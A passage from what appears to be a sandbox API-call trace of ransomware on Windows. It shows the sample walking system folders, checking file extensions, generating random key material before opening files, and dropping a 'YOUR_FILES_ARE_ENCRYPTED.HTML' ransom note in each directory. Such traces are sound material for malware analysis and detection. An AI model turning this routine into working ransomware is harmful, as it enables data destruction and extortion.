ftCreationTime.dwHighDateTime=0x1ca040c, ftLastAccessTime.dwLowDateTime=0xa84024fc, ftLastAccessTime.dwHighDateTime=0x1ca040c, ftLastWriteTime.dwLowDateTime=0x1d9a8bbc, ftLastWriteTime.dwHighDateTime=0x1c9ea14, nFileSizeHigh=0x0, nFileSizeLow=0x10654, dwReserved0=0x0, dwReserved1=0x60, cFileName="scan_property.ico", cAlternateFileName="")) returned 1 [0169.861] wnsprintfW (in: pszDest=0x73f0050, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\scan_property.ico") returned 107 [0169.861] lstrcmpW (lpString1="scan_property.ico", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0169.861] PathFindExtensionW (pszPath="scan_property.ico") returned=".ico" [0169.861] lstrlenW (lpString=".ico") returned 4 [0169.861] PathFindExtensionW (pszPath="scan_property.ico") returned=".ico" [0169.861] FindNextFileW (in: hFindFile=0x42f3200, lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa83dc39d, ftCreationTime.dwHighDateTime=0x1ca040c, ftLastAccessTime.dwLowDateTime=0xa83dc39d, ftLastAccessTime.dwHighDateTime=0x1ca040c, ftLastWriteTime.dwLowDateTime=0x1d9a8bbc, ftLastWriteTime.dwHighDateTime=0x1c9ea14, nFileSizeHigh=0x0, nFileSizeLow=0xf8c2, dwReserved0=0x0, dwReserved1=0x60, cFileName="scan_settings.ico", cAlternateFileName="")) returned 1 [0169.861] wnsprintfW (in: pszDest=0x73f0050, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\scan_settings.ico") returned 107 [0169.861] lstrcmpW (lpString1="scan_settings.ico", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0169.861] PathFindExtensionW (pszPath="scan_settings.ico") returned=".ico" [0169.861] lstrlenW (lpString=".ico") returned 4 [0169.861] PathFindExtensionW (pszPath="scan_settings.ico") returned=".ico" [0169.861] FindNextFileW (in: hFindFile=0x42f3200, lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa8213329, ftCreationTime.dwHighDateTime=0x1ca040c, ftLastAccessTime.dwLowDateTime=0xa8213329, ftLastAccessTime.dwHighDateTime=0x1ca040c, ftLastWriteTime.dwLowDateTime=0x1daff81c, ftLastWriteTime.dwHighDateTime=0x1c9ea14, nFileSizeHigh=0x0, nFileSizeLow=0x2c64, dwReserved0=0x0, dwReserved1=0x60, cFileName="tasks.xml", cAlternateFileName="")) returned 1 [0169.861] wnsprintfW (in: pszDest=0x73f0050, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\tasks.xml") returned 99 [0169.862] lstrcmpW (lpString1="tasks.xml", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0169.862] PathFindExtensionW (pszPath="tasks.xml") returned=".xml" [0169.862] lstrlenW (lpString=".xml") returned 4 [0169.862] PathFindExtensionW (pszPath="tasks.xml") returned=".xml" [0169.862] SystemFunction036 (in: RandomBuffer=0x4ebd4e0, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebd4e0) returned 1 [0169.862] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\tasks.xml" (normalized: "c:\\users\\all users\\microsoft\\device stage\\task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\tasks.xml"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0xffffffff [0169.862] FindNextFileW (in: hFindFile=0x42f3200, lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcbb19b80, ftCreationTime.dwHighDateTime=0x1d7fb46, ftLastAccessTime.dwLowDateTime=0xcbb19b80, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcbb19b80, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x0, dwReserved1=0x60, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 1 [0169.862] wnsprintfW (in: pszDest=0x73f0050, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 119 [0169.862] lstrcmpW (lpString1="YOUR_FILES_ARE_ENCRYPTED.HTML", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0 [0169.862] FindNextFileW (in: hFindFile=0x42f3200, lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcbb19b80, ftCreationTime.dwHighDateTime=0x1d7fb46, ftLastAccessTime.dwLowDateTime=0xcbb19b80, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcbb19b80, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x0, dwReserved1=0x60, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 0 [0169.862] FindClose (in: hFindFile=0x42f3200 | out: hFindFile=0x42f3200) returned 1 [0169.862] wnsprintfW (in: pszDest=0x73f0050, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 119 [0169.862] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\all users\\microsoft\\device stage\\task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0169.862] GetProcessHeap () returned 0x270000 [0169.863] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x73f0050 | out: hHeap=0x270000) returned 1 [0169.863] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf9ebda38, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0xcbb19b80, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcbb19b80, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="{e35be42d-f742-4d96-a50a-1775fb1a7a42}", cAlternateFileName="{E35BE~1")) returned 0 [0169.863] FindClose (in: hFindFile=0x42f31c0 | out: hFindFile=0x42f31c0) returned 1 [0169.863] wnsprintfW (in: pszDest=0x73e0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 80 [0169.864] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\all users\\microsoft\\device stage\\task\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0169.864] GetProcessHeap () returned 0x270000 [0169.864] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x73e0048 | out: hHeap=0x270000) returned 1 [0169.865] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xcbb19b80, ftCreationTime.dwHighDateTime=0x1d7fb46, ftLastAccessTime.dwLowDateTime=0xcbb19b80, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcbb19b80, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x0, dwReserved1=0x60, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 1 [0169.865] wnsprintfW (in: pszDest=0x74fa168, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 75 [0169.865] lstrcmpW (lpString1="YOUR_FILES_ARE_ENCRYPTED.HTML", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0 [0169.865] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xcbb19b80, ftCreationTime.dwHighDateTime=0x1d7fb46, ftLastAccessTime.dwLowDateTime=0xcbb19b80, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcbb19b80, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x0, dwReserved1=0x60, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 0 [0169.865] FindClose (in: hFindFile=0x42f3180 | out: hFindFile=0x42f3180) returned 1 [0169.865] wnsprintfW (in: pszDest=0x74fa168, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 75 [0169.868] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\all users\\microsoft\\device stage\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0169.868] GetProcessHeap () returned 0x270000 [0169.869] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x74fa168 | out: hHeap=0x270000) returned 1 [0169.874] FindNextFileW (in: hFindFile=0x42f3140, lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf9f09cf6, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0xcbb3fce0, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcbb3fce0, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="DeviceSync", cAlternateFileName="DEVICE~2")) returned 1 [0169.874] wnsprintfW (in: pszDest=0x74ea160, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\DeviceSync") returned 43 [0169.875] GetProcessHeap () returned 0x270000 [0169.875] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x74fa168 [0169.876] lstrcpyW (in: lpString1=0x74fa168, lpString2="\\\\?\\C:\\Users\\All Users\\Microsoft\\DeviceSync" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\DeviceSync") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\DeviceSync" [0169.876] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\DeviceSync", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\DeviceSync\\*") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\DeviceSync\\*" [0169.876] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\DeviceSync\\*", lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf9f09cf6, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0xcbb3fce0, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcbb3fce0, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f3180 [0169.877] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf9f09cf6, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0xcbb3fce0, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcbb3fce0, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 [0169.877] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcbb3fce0, ftCreationTime.dwHighDateTime=0x1d7fb46, ftLastAccessTime.dwLowDateTime=0xcbb3fce0, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcbb3fce0, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x0, dwReserved1=0x60, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 1 [0169.877] wnsprintfW (in: pszDest=0x74fa168, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\DeviceSync\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 73 [0169.877] lstrcmpW (lpString1="YOUR_FILES_ARE_ENCRYPTED.HTML", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0 [0169.877] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcbb3fce0, ftCreationTime.dwHighDateTime=0x1d7fb46, ftLastAccessTime.dwLowDateTime=0xcbb3fce0, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcbb3fce0, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x0, dwReserved1=0x60, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 0 [0169.877] FindClose (in: hFindFile=0x42f3180 | out: hFindFile=0x42f3180) returned 1 [0169.877] wnsprintfW (in: pszDest=0x74fa168, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\DeviceSync\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 73 [0169.877] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\DeviceSync\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\all users\\microsoft\\devicesync\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0169.877] GetProcessHeap () returned 0x270000 [0169.878] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x74fa168 | out: hHeap=0x270000) returned 1 [0169.878] FindNextFileW (in: hFindFile=0x42f3140, lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xf9f09cf6, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0xcbb65e40, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcbb65e40, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="DRM", cAlternateFileName="")) returned 1 [0169.878] wnsprintfW (in: pszDest=0x74ea160, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\DRM") returned 36 [0169.878] GetProcessHeap () returned 0x270000 [0169.878] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x74fa168 [0169.878] lstrcpyW (in: lpString1=0x74fa168, lpString2="\\\\?\\C:\\Users\\All Users\\Microsoft\\DRM" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\DRM") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\DRM" [0169.878] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\DRM", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\DRM\\*") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\DRM\\*" [0169.878] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\DRM\\*", lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xf9f09cf6, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0xcbb65e40, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcbb65e40, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f3180 [0169.878] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xf9f09cf6, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0xcbb65e40, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcbb65e40, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 [0169.879] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xf9f09cf6, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0xcbb3fce0, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcbb3fce0, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="Server", cAlternateFileName="")) returned 1 [0169.879] wnsprintfW (in: pszDest=0x74fa168, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\DRM\\Server") returned 43 [0169.879] GetProcessHeap () returned 0x270000 [0169.879] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x73e0048 [0169.882] lstrcpyW (in: lpString1=0x73e0048, lpString2="\\\\?\\C:\\Users\\All Users\\Microsoft\\DRM\\Server" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\DRM\\Server") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\DRM\\Server" [0169.882] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\DRM\\Server", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\DRM\\Server\\*") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\DRM\\Server\\*" [0169.882] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\DRM\\Server\\*", lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xf9f09cf6, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0xcbb3fce0, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcbb3fce0, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f31c0 [0169.882] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xf9f09cf6, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0xcbb3fce0, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcbb3fce0, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 [0169.883] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcbb3fce0, ftCreationTime.dwHighDateTime=0x1d7fb46, ftLastAccessTime.dwLowDateTime=0xcbb3fce0, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcbb65e40, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x0, dwReserved1=0x60, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 1 [0169.883] wnsprintfW (in: pszDest=0x73e0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\DRM\\Server\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 73 [0169.883] lstrcmpW (lpString1="YOUR_FILES_ARE_ENCRYPTED.HTML", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0 [0169.883] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcbb3fce0, ftCreationTime.dwHighDateTime=0x1d7fb46, ftLastAccessTime.dwLowDateTime=0xcbb3fce0, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcbb65e40, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x0, dwReserved1=0x60, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 0 [0169.883] FindClose (in: hFindFile=0x42f31c0 | out: hFindFile=0x42f31c0) returned 1 [0169.884] wnsprintfW (in: pszDest=0x73e0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\DRM\\Server\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 73 [0169.884] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\DRM\\Server\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\all users\\microsoft\\drm\\server\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0169.884] GetProcessHeap () returned 0x270000 [0169.884] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x73e0048 | out: hHeap=0x270000) returned 1 [0169.884] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xcbb65e40, ftCreationTime.dwHighDateTime=0x1d7fb46, ftLastAccessTime.dwLowDateTime=0xcbb65e40, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcbb65e40, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x0, dwReserved1=0x60, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 1 [0169.884] wnsprintfW (in: pszDest=0x74fa168, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\DRM\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 66 [0169.885] lstrcmpW (lpString1="YOUR_FILES_ARE_ENCRYPTED.HTML", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0 [0169.885] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xcbb65e40, ftCreationTime.dwHighDateTime=0x1d7fb46, ftLastAccessTime.dwLowDateTime=0xcbb65e40, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcbb65e40, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x0, dwReserved1=0x60, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 0 [0169.885] FindClose (in: hFindFile=0x42f3180 | out: hFindFile=0x42f3180) returned 1 [0169.885] wnsprintfW (in: pszDest=0x74fa168, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\DRM\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 66 [0169.885] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\DRM\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\all users\\microsoft\\drm\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0169.885] GetProcessHeap () returned 0x270000 [0169.885] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x74fa168 | out: hHeap=0x270000) returned 1 [0169.886] FindNextFileW (in: hFindFile=0x42f3140, lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xc371f54c, ftCreationTime.dwHighDateTime=0x1cbf8b8, ftLastAccessTime.dwLowDateTime=0xcbb65e40, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcbb65e40, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="eHome", cAlternateFileName="")) returned 1 [0169.886] wnsprintfW (in: pszDest=0x74ea160, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\eHome") returned 38 [0169.886] GetProcessHeap () returned 0x270000 [0169.886] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x74fa168 [0169.886] lstrcpyW (in: lpString1=0x74fa168, lpString2="\\\\?\\C:\\Users\\All Users\\Microsoft\\eHome" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\eHome") returned="\\\\?\\C:\\Users\\All 